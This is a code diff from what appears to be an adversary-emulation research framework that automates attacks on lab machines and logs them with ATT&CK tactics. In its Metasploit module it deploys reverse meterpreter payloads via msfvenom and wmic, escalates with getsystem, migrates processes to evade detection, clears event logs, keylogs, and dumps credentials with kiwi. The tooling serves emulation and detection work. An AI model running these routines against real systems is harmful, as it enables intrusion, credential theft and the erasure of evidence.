1) # Wait until all targets are registered as Caldera targets @@ -98,22 +109,37 @@ class Experiment(): running_agents = self.caldera_control.list_paws_of_running_agents() self.attack_logger.vprint(f"Agents currently running: {running_agents}", 2) while target_1.get_paw() not in running_agents: + if self.machine_needs_caldera(target_1, caldera_attacks) == 0: + self.attack_logger.vprint(f"No caldera agent needed for: {target_1.get_paw()} ", 3) + break self.attack_logger.vprint(f"Connecting to caldera {caldera_url}, running agents are: {running_agents}", 3) self.attack_logger.vprint(f"Missing agent: {target_1.get_paw()} ...", 3) target_1.start_caldera_client() - self.attack_logger.vprint(f"Restarted caldera agent: {target_1.get_paw()} ...", ) + self.attack_logger.vprint(f"Restarted caldera agent: {target_1.get_paw()} ...", 3) time.sleep(120) # Was 30, but maybe there are timing issues running_agents = self.caldera_control.list_paws_of_running_agents() self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Caldera agents reached{CommandlineColors.ENDC}", 1) + # Add running machines to log + for target in self.targets: + i = target.get_machine_info() + i["role"] = "target" + self.attack_logger.add_machine_info(i) + + i = self.attacker_1.get_machine_info() + i["role"] = "attacker" + self.attack_logger.add_machine_info(i) + # Attack them self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Running Caldera attacks{CommandlineColors.ENDC}", 1) for target_1 in self.targets: if caldera_attacks is None: # Run caldera attacks - caldera_attacks = self.experiment_config.get_caldera_attacks(target_1.get_os()) - if caldera_attacks: - for attack in caldera_attacks: + new_caldera_attacks = self.experiment_config.get_caldera_attacks(target_1.get_os()) + else: + new_caldera_attacks = caldera_attacks + if new_caldera_attacks: + for attack in new_caldera_attacks: # TODO: Work with snapshots # TODO: If we have several targets in the same group, it is nonsense to attack each one separately. Make this smarter self.attack_logger.vprint(f"Attacking machine with PAW: {target_1.get_paw()} with {attack}", 2) @@ -137,6 +163,9 @@ class Experiment(): time.sleep(self.experiment_config.get_nap_time()) retries = 100 for target_system in self.targets: + if self.machine_needs_caldera(target_system, caldera_attacks) == 0: + self.attack_logger.vprint(f"No caldera agent needed for: {target_system.get_paw()} ", 3) + continue running_agents = self.caldera_control.list_paws_of_running_agents() self.attack_logger.vprint(f"Agents currently connected to the server: {running_agents}", 2) while target_system.get_paw() not in running_agents: @@ -151,10 +180,12 @@ class Experiment(): self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Finished Caldera attacks{CommandlineColors.ENDC}", 1) - # Run Kali attacks + # Run plugin based attacks self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Running attack plugins{CommandlineColors.ENDC}", 1) for target_1 in self.targets: plugin_based_attacks = self.experiment_config.get_plugin_based_attacks(target_1.get_os()) + metasploit_plugins = self.plugin_manager.count_caldera_requirements(AttackPlugin, plugin_based_attacks) + print(f"Plugins needing metasploit for {target_1.get_paw()} : {metasploit_plugins}") for attack in plugin_based_attacks: # TODO: Work with snapshots self.attack_logger.vprint(f"Attacking machine with PAW: {target_1.get_paw()} with attack: {attack}", 1) @@ -184,9 +215,28 @@ class Experiment(): self.__stop_attacker() self.attack_logger.post_process() - self.attack_logger.write_json(os.path.join(self.lootdir, "attack.json")) + attack_log_file_path = os.path.join(self.lootdir, "attack.json") + self.attack_logger.write_json(attack_log_file_path) + document_generator = DocGenerator() + document_generator.generate(attack_log_file_path) + document_generator.compile_documentation() + zip_this += document_generator.get_outfile_paths() self.zip_loot(zip_this) + def machine_needs_caldera(self, target, caldera_conf): + """ Counts the attacks and plugins needing caldera that are registered for this machine """ + + c_cmdline = 0 + if caldera_conf is not None: + c_cmdline = len(caldera_conf) + c_conffile = len(self.experiment_config.get_caldera_attacks(target.get_os())) + plugin_based_attacks = self.experiment_config.get_plugin_based_attacks(target.get_os()) + c_plugins = self.plugin_manager.count_caldera_requirements(AttackPlugin, plugin_based_attacks) + + print(f"Caldera count: From cmdline: {c_cmdline}, From conf: {c_conffile} from plugins: {c_plugins}") + + return c_cmdline + c_conffile + c_plugins + def attack(self, target, attack): """ Pick an attack and run it @@ -198,11 +248,13 @@ class Experiment(): for plugin in self.plugin_manager.get_plugins(AttackPlugin, [attack]): name = plugin.get_name() - self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Running Kali plugin {name}{CommandlineColors.ENDC}", 2) + self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Running Attack plugin {name}{CommandlineColors.ENDC}", 2) plugin.process_config(self.experiment_config.attack_conf(plugin.get_config_section_name())) plugin.set_attacker_machine(self.attacker_1) + plugin.set_sysconf({}) plugin.set_logger(self.attack_logger) plugin.set_caldera(self.caldera_control) + plugin.connect_metasploit() plugin.install() # plugin.__set_logger__(self.attack_logger) @@ -223,6 +275,10 @@ class Experiment(): zfh.write(os.path.join(self.lootdir, "attack.json")) + # For automation purpose we copy the file into a standard file name + defaultname = os.path.join(self.lootdir, "..", "most_recent.zip") + shutil.copyfile(filename, defaultname) + @staticmethod def __get_results_files(root): """ Yields a list of potential result files @@ -236,29 +292,29 @@ class Experiment(): if os.path.exists(a_file): yield a_file - def __clean_result_files(self, root): - """ Deletes result files + # def __clean_result_files(self, root): + # """ Deletes result files - @param root: Root dir of the machine to collect data from - """ + # @param root: Root dir of the machine to collect data from + # """ # TODO: Properly implement. Get proper root parameter - for a_file in self.__get_results_files(root): - os.remove(a_file) + # for a_file in self.__get_results_files(root): + # os.remove(a_file) - def __collect_loot(self, root): - """ Collect results into loot dir + # def __collect_loot(self, root): + # """ Collect results into loot dir - @param root: Root dir of the machine to collect data from - """ + # @param root: Root dir of the machine to collect data from + # """ - try: - os.makedirs(os.path.abspath(self.experiment_config.loot_dir())) - except FileExistsError: - pass - for a_file in self.__get_results_files(root): - self.attack_logger.vprint("Copy {} {}".format(a_file, os.path.abspath(self.experiment_config.loot_dir())), 3) + # try: + # os.makedirs(os.path.abspath(self.experiment_config.loot_dir())) + # except FileExistsError: + # pass + # for a_file in self.__get_results_files(root): + # self.attack_logger.vprint("Copy {} {}".format(a_file, os.path.abspath(self.experiment_config.loot_dir())), 3) def __start_attacker(self): """ Start the attacking VM """ diff --git a/app/machinecontrol.py b/app/machinecontrol.py index b5ac66b..e679847 100644 --- a/app/machinecontrol.py +++ b/app/machinecontrol.py @@ -3,6 +3,7 @@ """ (Virtual) machine handling. Start, stop, create and destroy. Starting remote commands on them. """ import os +import socket import time import requests @@ -372,6 +373,23 @@ class Machine(): return self.vm_manager.get(src, dst) + def get_machine_info(self) -> dict: + """ Returns a dict containing machine info """ + + return {"name": self.get_name(), + "nicknames": self.get_nicknames(), + "playground": self.get_playground(), + "net_id": self.get_ip(), + "ip": socket.gethostbyname(self.get_ip()), + "os": self.get_os(), + "paw": self.get_paw(), + "group": self.get_group(), + "sensors": [s.name for s in self.get_sensors()], + "vulnerabilities": [v.name for v in self.get_vulnerabilities()] + } + # TODO: Caldera implant + # TODO: Metasploit implant + def install_caldera_server(self, cleanup=False, version="2.8.1"): """ Installs the caldera server on the VM diff --git a/app/metasploit.py b/app/metasploit.py index 180dd26..d3a12b0 100644 --- a/app/metasploit.py +++ b/app/metasploit.py @@ -43,19 +43,25 @@ class Metasploit(): kwargs["server"] = self.attacker.get_ip() time.sleep(3) # Waiting for server to start. Or we would get https connection errors when getting the client. - def start_exploit_stub_for_external_payload(self, payload='linux/x64/meterpreter_reverse_tcp', exploit='exploit/multi/handler'): + def start_exploit_stub_for_external_payload(self, payload='linux/x64/meterpreter_reverse_tcp', exploit='exploit/multi/handler', lhost=None): """ Start a metasploit handler and wait for external payload to connect + @param payload: The payload being used in the implant + @param exploit: Normally the generic handler. Overwrite it if you feel lucky + @param lhost: the ip of the attack host. Use this to use the attacker ip as seen from the controller. @:returns: res, which contains "job_id" and "uuid" """ - exploit = self.get_client().modules.use('exploit', exploit) + exp = self.get_client().modules.use('exploit', exploit) # print(exploit.description) # print(exploit.missing_required) - payload = self.get_client().modules.use('payload', payload) + pl = self.get_client().modules.use('payload', payload) # print(payload.description) # print(payload.missing_required) - payload["LHOST"] = self.attacker.get_ip() - res = exploit.execute(payload=payload) + if lhost is None: + lhost = self.attacker.get_ip() + pl["LHOST"] = lhost + print(f"Creating stub for external payload Exploit: {exploit} Payload: {payload}, lhost: {lhost}") + res = exp.execute(payload=pl) print(res) return res @@ -104,7 +110,7 @@ class Metasploit(): while self.get_client().sessions.list == {}: time.sleep(1) - print(f"Waiting to get any session {retries}") + print(f"Metasploit waiting to get any session {retries}") retries -= 1 if retries <= 0: raise MetasploitError("Can not find any session") @@ -191,34 +197,30 @@ class Metasploit(): return res - def smart_infect(self, target, payload_type="windows/x64/meterpreter/reverse_https", payload_name="babymetal.exe"): + def smart_infect(self, target, **kwargs): """ Checks if a target already has a meterpreter session open. Will deploy a payload if not """ # TODO Smart_infect should detect the platform of the target and pick the proper parameters based on that + payload_name = kwargs.get("outfile", "babymetal.exe") + payload_type = kwargs.get("payload", None) + if payload_type is None: + raise MetasploitError("Payload not defined") try: - self.start_exploit_stub_for_external_payload(payload=payload_type) + self.start_exploit_stub_for_external_payload(payload_type, lhost=kwargs.get("lhost", None)) self.wait_for_session(2) except MetasploitError: self.attack_logger.vprint( - f"{CommandlineColors.OKCYAN}Create payload {payload_name} replacement{CommandlineColors.ENDC}", + f"{CommandlineColors.OKCYAN}Create payload {payload_name} {CommandlineColors.ENDC}", 1) venom = MSFVenom(self.attacker, target, self.attack_logger) - venom.generate_and_deploy(payload=payload_type, - architecture="x86", - platform="windows", - lhost=self.attacker.get_ip(), - format="exe", - outfile=payload_name, - encoder="x86/shikata_ga_nai", - iterations=5 - ) + venom.generate_and_deploy(**kwargs) self.attack_logger.vprint( - f"{CommandlineColors.OKCYAN}Execute {payload_name} replacement - waiting for meterpreter shell{CommandlineColors.ENDC}", + f"{CommandlineColors.OKCYAN}Execute {payload_name} - waiting for meterpreter shell{CommandlineColors.ENDC}", 1) - self.start_exploit_stub_for_external_payload(payload=payload_type) + self.start_exploit_stub_for_external_payload(payload=payload_type, lhost=kwargs.get("lhost", None)) self.wait_for_session() ########################################################################## @@ -276,6 +278,7 @@ class MSFVenom(): cmd += f" -e {encoder}" if iterations is not None: cmd += f" -i {iterations}" + cmd += " SessionRetryWait=1 " # Detecting all the mistakes that already have been made. To be continued # Check if encoder supports the architecture @@ -294,6 +297,7 @@ class MSFVenom(): # Footnote: Currently we only support windows/linux and the "boring" payloads. This will be more tricky as soon as we get creative here + print(f"MSFVenom: {cmd}") self.attacker.remote_run(cmd) def generate_and_deploy(self, **kwargs): @@ -327,8 +331,7 @@ class MSFVenom(): cmd = "" cmd += f"chmod +x {payload_name}; ./{payload_name}" if self.target.get_os() == "windows": - cmd = f'{payload_name}' - + cmd = f'wmic process call create "%homepath%\\{payload_name}",""' print(cmd) if self.attack_logger: @@ -431,7 +434,8 @@ class MetasploitInstant(Metasploit): target=target.get_ip(), metasploit_command=command, ttp=ttp, - logid=logid) + logid=logid, + result=res) return res def migrate(self, target, user=None, name=None, arch=None): @@ -443,6 +447,9 @@ class MetasploitInstant(Metasploit): """ ttp = "T1055" + tactics = "Privilege Escalation" + tactics_id = "TA0004" + description = "Migrating to another process can escalate privileges, move the meterpreter to a long running process or evade detection. For that the Meterpreter stub is injected into another process and the new stub then connects to the Metasploit server instead of the old one." process_list = self.ps_process_discovery(target) ps = self.parse_ps(process_list[0]) @@ -456,16 +463,22 @@ class MetasploitInstant(Metasploit): target_process = random.choice(filtered_list) print(f"Migrating to process {target_process}") command = f"migrate {target_process['PID']}" - self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), - target=target.get_ip(), - metasploit_command=command, - ttp=ttp) - res = self.meterpreter_execute_on([command], target) - print(res) + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + name="migrate", + description=description, + tactics=tactics, + tactics_id=tactics_id, + ttp=ttp) + res = self.meterpreter_execute_on([command], target, delay=5) + print(f"Result of migrate {res}") self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, - ttp=ttp) + ttp=ttp, + result=res, + logid=logid) return res def arp_network_discovery(self, target, **kwargs): @@ -498,7 +511,8 @@ class MetasploitInstant(Metasploit): target=target.get_ip(), metasploit_command=command, ttp=ttp, - logid=logid) + logid=logid, + result=res) return res def nslookup(self, target, target2, **kwargs): @@ -535,22 +549,31 @@ class MetasploitInstant(Metasploit): target=target.get_ip(), metasploit_command=command, ttp=ttp, - logid=logid) + logid=logid, + result=res) return res - def getsystem(self, target, **kwargs): - """ Do a network discovery on the target """ + def getsystem(self, target, variant=0, **kwargs): + """ Do a network discovery on the target + + @param target: Target to attack + @param variant: Variant of getsystem to use. 0 is auto, max is 3 + """ command = "getsystem" ttp = "????" # It uses one out of three different ways to elevate privileges. tactics = "Privilege Escalation" tactics_id = "TA0004" description = """ -Elevate privileges from local administrator to SYSTEM. Three ways to do that will be tried: -* named pipe impersonation using cmd -* named pipe impersonation using a dll -* token duplication +Elevate privileges from local administrator to SYSTEM. Three ways to do that will be tried:\n +0) auto \n +1) named pipe impersonation using cmd \n +2) named pipe impersonation using a dll \n +3) token duplication\n """ + + if variant != 0: + command += f" -t {variant}" # https://docs.rapid7.com/metasploit/meterpreter-getsystem/ self.attack_logger.vprint( @@ -573,31 +596,45 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil target=target.get_ip(), metasploit_command=command, ttp=ttp, - logid=logid) + logid=logid, + result=res) return res - def clearev(self, target): + def clearev(self, target, **kwargs): """ Clears windows event logs """ command = "clearev" ttp = "T1070.001" # It uses one out of three different ways to elevate privileges. + tactics = "Defense Evasion" + tactics_id = "TA0005" + description = """ +Clear windows event logs to hide tracks + """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) - self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), - target=target.get_ip(), - metasploit_command=command, - ttp=ttp) + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + name="clearev", + description=description, + tactics=tactics, + tactics_id=tactics_id, + situation_description=kwargs.get("situation_description", None), + countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on([command], target) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, - ttp=ttp) + ttp=ttp, + logid=logid, + result=res) return res - def screengrab(self, target): + def screengrab(self, target, **kwargs): """ Creates a screenshot Before using it, migrate to a process running while you want to monitor. @@ -606,14 +643,25 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil command = "screengrab" ttp = "T1113" # It uses one out of three different ways to elevate privileges. + tactics = "Collection" + tactics_id = "TA0009" + description = """ +Do screen grabbing to collect data on target + """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) - self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), - target=target.get_ip(), - metasploit_command=command, - ttp=ttp) + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + name="screengrab", + description=description, + tactics=tactics, + tactics_id=tactics_id, + situation_description=kwargs.get("situation_description", None), + countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on(["use espia"], target) print(res) res = self.meterpreter_execute_on([command], target) @@ -621,10 +669,12 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, - ttp=ttp) + ttp=ttp, + logid=logid, + result=res) return res - def keylogging(self, target, monitoring_time): + def keylogging(self, target, monitoring_time, **kwargs): """ Starts keylogging Before using it, migrate to a process running while you want to monitor. @@ -632,19 +682,29 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil "winlogon.exe" will monitor user logins. "explorer.exe" during the session. @param monitoring_time: Seconds the keylogger is running - @param monitoring_time: The time to monitor the keys. In seconds """ command = "keyscan_start" ttp = "T1056.001" # It uses one out of three different ways to elevate privileges. + tactics = "Collection" + tactics_id = "TA0009" + description = """ +Log keys to get passwords and other credentials + """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) - self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), - target=target.get_ip(), - metasploit_command=command, - ttp=ttp) + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + name="keylogging", + description=description, + tactics=tactics, + tactics_id=tactics_id, + situation_description=kwargs.get("situation_description", None), + countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on([command], target) print(res) time.sleep(monitoring_time) @@ -653,53 +713,82 @@ Elevate privileges from local administrator to SYSTEM. Three ways to do that wil self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, - ttp=ttp) + ttp=ttp, + logid=logid, + result=res) return res - def getuid(self, target): + def getuid(self, target, **kwargs): """ Returns the UID """ command = "getuid" ttp = "T1056.001" # It uses one out of three different ways to elevate privileges. + tactics = "Collection" + tactics_id = "TA0009" + description = """ +Get user id + """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) - self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), - target=target.get_ip(), - metasploit_command=command, - ttp=ttp) + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + name="getuid", + description=description, + tactics=tactics, + tactics_id=tactics_id, + situation_description=kwargs.get("situation_description", None), + countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on([command], target) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, - ttp=ttp) + ttp=ttp, + logid=logid, + result=res) + return res[0] - def sysinfo(self, target): + def sysinfo(self, target, **kwargs): """ Returns the sysinfo """ command = "sysinfo" ttp = "T1082" # It uses one out of three different ways to elevate privileges. + tactics = "Discovery" + tactics_id = "TA0007" + description = """ +Get basic system information + """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) - self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), - target=target.get_ip(), - metasploit_command=command, - ttp=ttp) + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + name="sysinfo", + description=description, + tactics=tactics, + tactics_id=tactics_id, + situation_description=kwargs.get("situation_description", None), + countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on([command], target) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, - ttp=ttp) + ttp=ttp, + logid=logid, + result=res) return res[0] def upload(self, target, src, dst, **kwargs): @@ -738,5 +827,62 @@ Uploading new files to the target. Can be config files, tools, implants, ... target=target.get_ip(), metasploit_command=command, ttp=ttp, - logid=logid) + logid=logid, + result=res) + return res + + def kiwi(self, target, variant="creds_all", **kwargs): + """ Kiwi is the modern equivalent to mimikatz + + @param target: target being attacked + @param variant: kiwi command being used + """ + + ttp = "t1003" + tactics = "Credential access" + tactics_id = "TA0006" + description = """ +Accessing user credentials in memory +""" + + res = [] + + self.attack_logger.vprint( + f"{CommandlineColors.OKCYAN}Preparing for Kiwi{CommandlineColors.ENDC}", 1) + + # We need system privileges + self.getsystem(target, 0, **kwargs) + + # Kiwi needs to be loaded + command = "load kiwi " + res += self.meterpreter_execute_on([command], target, kwargs.get("delay", 10)) + + # Executing kiwi + command = f"{variant} " + + self.attack_logger.vprint( + f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) + + logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + name="kiwi", + description=description, + tactics=tactics, + tactics_id=tactics_id, + situation_description=kwargs.get("situation_description", + None), + countermeasure=kwargs.get("countermeasure", None) + ) + res += self.meterpreter_execute_on([command], target, kwargs.get("delay", 10)) + + self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), + target=target.get_ip(), + metasploit_command=command, + ttp=ttp, + logid=logid, + result=res) + + print(res) return res diff --git a/app/pluginmanager.py b/app/pluginmanager.py index 0ca66bd..8a75124 100644 --- a/app/pluginmanager.py +++ b/app/pluginmanager.py @@ -3,14 +3,16 @@ from glob import glob import os +import straight.plugin # type: ignore from plugins.base.plugin_base import BasePlugin from plugins.base.attack import AttackPlugin from plugins.base.machinery import MachineryPlugin from plugins.base.sensor import SensorPlugin from plugins.base.vulnerability_plugin import VulnerabilityPlugin -import straight.plugin from app.interface_sfx import CommandlineColors +from app.attack_log import AttackLog + # from app.interface_sfx import CommandlineColors sections = [{"name": "Vulnerabilities", @@ -27,7 +29,7 @@ sections = [{"name": "Vulnerabilities", class PluginManager(): """ Manage plugins """ - def __init__(self, attack_logger): + def __init__(self, attack_logger: AttackLog): """ @param attack_logger: The attack logger to use @@ -69,6 +71,34 @@ class PluginManager(): res.append(plugin) return res + def count_caldera_requirements(self, subclass, name_filter=None) -> int: + """ Count the plugins matching the filter that have caldera requirements """ + + # So far it only supports attack plugins. Maybe this will be extended to other plugin types later. + assert subclass == AttackPlugin + + plugins = self.get_plugins(subclass, name_filter) + res = 0 + for plugin in plugins: + if plugin.needs_caldera(): + res += 1 + + return res + + def count_metasploit_requirements(self, subclass, name_filter=None) -> int: + """ Count the plugins matching the filter that have metasploit requirements """ + + # So far it only supports attack plugins. Maybe this will be extended to other plugin types later. + assert subclass == AttackPlugin + + plugins = self.get_plugins(subclass, name_filter) + res = 0 + for plugin in plugins: + if plugin.needs_metasploit(): + res += 1 + + return res + def print_list(self): """ Print a pretty list of all available plugins """ diff --git a/doc_generator.py b/doc_generator.py index fa5f76b..6415a34 100755 --- a/doc_generator.py +++ b/doc_generator.py @@ -1,41 +1,25 @@ #!/usr/bin/env python3 -# A standalon document generator. Takes an attack log and generates a doc using templates. Functionality will later be merged into PurpleDome +""" Generate human readable document describing the attack based on an attack log """ -import json -from jinja2 import Environment, FileSystemLoader, select_autoescape -# from pprint import pprint +import argparse +from app.doc_generator import DocGenerator +DEFAULT_ATTACK_LOG = "removeme/loot/2021_09_08___07_41_35/attack.json" # FIN 7 first run on environment -def generate(jfile, outfile): - env = Environment( - loader=FileSystemLoader("templates", encoding='utf-8', followlinks=False), - autoescape=select_autoescape(), - trim_blocks=True, - lstrip_blocks=True - ) - template = env.get_template("attack_description.rst") - with open(jfile) as fh: - events = json.load(fh) +def create_parser(): + """ Creates the parser for the command line arguments""" + parser = argparse.ArgumentParser("Controls an experiment on the configured systems") - print(template.render(events=events)) - # pprint(events) - # dest = os.path.join(self.get_plugin_path(), "filebeat.conf") - # with open(dest, "wt") as fh: - # res = template.render({"playground": self.get_playground()}) - # fh.write(res) + parser.add_argument("--attack_log", default=DEFAULT_ATTACK_LOG, help="The attack log the document is based on") + parser.add_argument("--outfile", default="tools/human_readable_documentation/source/contents.rst", help="The default output file") + return parser -if __name__ == "__main__": - # generate("loot/2021_07_19___16_28_45/attack.json", "tools/human_readable_documentation/contents.rst") # Working example for a short run - # generate("loot/2021_07_20___08_26_33/attack.json", "tools/human_readable_documentation/contents.rst") # FIN 7 #1 - # generate("loot/2021_07_20___10_07_36/attack.json", "tools/human_readable_documentation/contents.rst") # FIN 7 #2 The one Fabrizio got - #generate("loot/2021_07_28___12_09_00/attack.json", - # "tools/human_readable_documentation/contents.rst") # FIN 7 The last minute locally generated thing - generate("loot/2021_08_30___14_40_23/attack.json", - "tools/human_readable_documentation/contents.rst") # FIN 7 With genereated files added +if __name__ == "__main__": + arguments = create_parser().parse_args() - # generate("loot/2021_07_19___15_10_45/attack.json", "tools/human_readable_documentation/contents.rst") - # generate("removeme.json", "tools/human_readable_documentation/contents.rst") + dg = DocGenerator() + dg.generate(arguments.attack_log, arguments.outfile) diff --git a/init.sh b/init.sh index b70b436..7a42100 100755 --- a/init.sh +++ b/init.sh @@ -3,6 +3,7 @@ # Init the system sudo apt-get -y install python3-venv +sudo apt-get -y install latexmk texlive-fonts-recommended texlive-latex-recommended texlive-latex-extra python3 -m venv venv source venv/bin/activate pip3 install -r requirements.txt \ No newline at end of file diff --git a/plugins/base/attack.py b/plugins/base/attack.py index 3f27a23..f8b21de 100644 --- a/plugins/base/attack.py +++ b/plugins/base/attack.py @@ -1,41 +1,72 @@ #!/usr/bin/env python3 """ Base class for Kali plugins """ +from enum import Enum import os -from plugins.base.plugin_base import BasePlugin -from app.exceptions import PluginError, ConfigurationError +from typing import Optional + from app.calderacontrol import CalderaControl -# from app.metasploit import MSFVenom, Metasploit +from app.exceptions import PluginError, ConfigurationError, RequirementError +from app.metasploit import MetasploitInstant +from plugins.base.machinery import MachineryPlugin +from plugins.base.plugin_base import BasePlugin + + +class Requirement(Enum): + """ Requirements for this plugin """ + METASPLOIT = 1 + CALDERA = 2 class AttackPlugin(BasePlugin): """ Class to execute a command on a kali system targeting another system """ # Boilerplate - name = None - description = None - ttp = None + name: Optional[str] = None + description: Optional[str] = None + ttp: Optional[str] = None references = None - required_files = [] # Better use the other required_files features - required_files_attacker = [] # a list of files to automatically install to the attacker - required_files_target = [] # a list of files to automatically copy to the targets + required_files: list[str] = [] # Better use the other required_files features + required_files_attacker: list[str] = [] # a list of files to automatically install to the attacker + required_files_target: list[str] = [] # a list of files to automatically copy to the targets + + requirements: Optional[list[Requirement]] = [] # Requirements to run this plugin # TODO: parse results def __init__(self): super().__init__() - self.conf = {} # Plugin specific configuration - self.sysconf = {} # System configuration. common for all plugins + self.conf: dict = {} # Plugin specific configuration + # self.sysconf = {} # System configuration. common for all plugins self.attacker_machine_plugin = None # The machine plugin referencing the attacker. The Kali machine should be the perfect candidate self.target_machine_plugin = None # The machine plugin referencing the target self.caldera = None # The Caldera connection object self.targets = None - self.metasploit_password = "password" - self.metasploit_user = "user" + self.metasploit_password: str = "password" + self.metasploit_user: str = "user" self.metasploit = None + def needs_caldera(self) -> bool: + """ Returns True if this plugin has Caldera in the requirements """ + if Requirement.CALDERA in self.requirements: + return True + return False + + def needs_metasploit(self) -> bool: + """ Returns True if this plugin has Metasploit in the requirements """ + if Requirement.METASPLOIT in self.requirements: + return True + return False + + def connect_metasploit(self): + """ Inits metasploit """ + + if self.needs_metasploit(): + self.metasploit = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user) + # If metasploit requirements are not set, self.metasploit stay None and using metasploit from a plugin not having the requirements will trigger an exception + def copy_to_attacker_and_defender(self): """ Copy attacker/defender specific files to the machines. Called by setup, do not call it yourself. template processing happens before """ @@ -50,7 +81,7 @@ class AttackPlugin(BasePlugin): """ Cleanup afterwards """ pass # pylint: disable=unnecessary-pass - def attacker_run_cmd(self, command, disown=False): + def attacker_run_cmd(self, command: str, disown: bool = False) -> str: """ Execute a command on the attacker @param command: Command to execute @@ -65,7 +96,7 @@ class AttackPlugin(BasePlugin): res = self.attacker_machine_plugin.__call_remote_run__(command, disown=disown) return res - def targets_run_cmd(self, command, disown=False): + def targets_run_cmd(self, command: str, disown: bool = False) -> str: """ Execute a command on the target @param command: Command to execute @@ -80,7 +111,7 @@ class AttackPlugin(BasePlugin): res = self.target_machine_plugin.__call_remote_run__(command, disown=disown) return res - def set_target_machines(self, machine): + def set_target_machines(self, machine: MachineryPlugin): """ Set the machine to target @param machine: Machine plugin to communicate with @@ -88,7 +119,7 @@ class AttackPlugin(BasePlugin): self.target_machine_plugin = machine.vm_manager - def set_attacker_machine(self, machine): + def set_attacker_machine(self, machine: MachineryPlugin): """ Set the machine plugin class to target @param machine: Machine to communicate with @@ -101,16 +132,21 @@ class AttackPlugin(BasePlugin): @param caldera: The caldera object to connect through """ - self.caldera = caldera - def caldera_attack(self, target, ability_id, parameters=None, **kwargs): + if self.needs_caldera(): + self.caldera = caldera + + def caldera_attack(self, target: MachineryPlugin, ability_id: str, parameters=None, **kwargs): """ Attack a single target using caldera @param target: Target machine object - @param ability_id: Ability if od caldera ability to run + @param ability_id: Ability or caldera ability to run @param parameters: parameters to pass to the ability """ + if not self.needs_caldera(): + raise RequirementError("Caldera not in requirements") + self.caldera.attack(paw=target.get_paw(), ability_id=ability_id, group=target.get_group(), @@ -130,7 +166,7 @@ class AttackPlugin(BasePlugin): return self.attacker_machine_plugin.get_playground() - def run(self, targets): + def run(self, targets: list[str]): """ Run the command @param targets: A list of targets, ip addresses will do @@ -172,7 +208,7 @@ class AttackPlugin(BasePlugin): raise NotImplementedError - def get_target_by_name(self, name): + def get_target_by_name(self, name: str): """ Returns a target machine out of the target pool by matching the name If there is no matching name it will look into the "nicknames" list of the machine config diff --git a/plugins/base/caldera.py b/plugins/base/caldera.py.removed similarity index 80% rename from plugins/base/caldera.py rename to plugins/base/caldera.py.removed index 8f1eb8b..80c0e0d 100644 --- a/plugins/base/caldera.py +++ b/plugins/base/caldera.py.removed @@ -5,6 +5,7 @@ Special for this plugin class: If there is no plugin matching a specified attack You only gotta write a plugin if you want some special features """ +from typing import Optional from plugins.base.plugin_base import BasePlugin @@ -12,32 +13,32 @@ class CalderaPlugin(BasePlugin): """ Class to execute a command on a caldera system targeting another system """ # Boilerplate - name = None - description = None - ttp = None + name: Optional[str] = None + description: Optional[str] = None + ttp: Optional[str] = None references = None - required_files = [] + required_files: list[str] = [] # TODO: parse results def __init__(self): super().__init__() - self.conf = {} # Plugin specific configuration - self.sysconf = 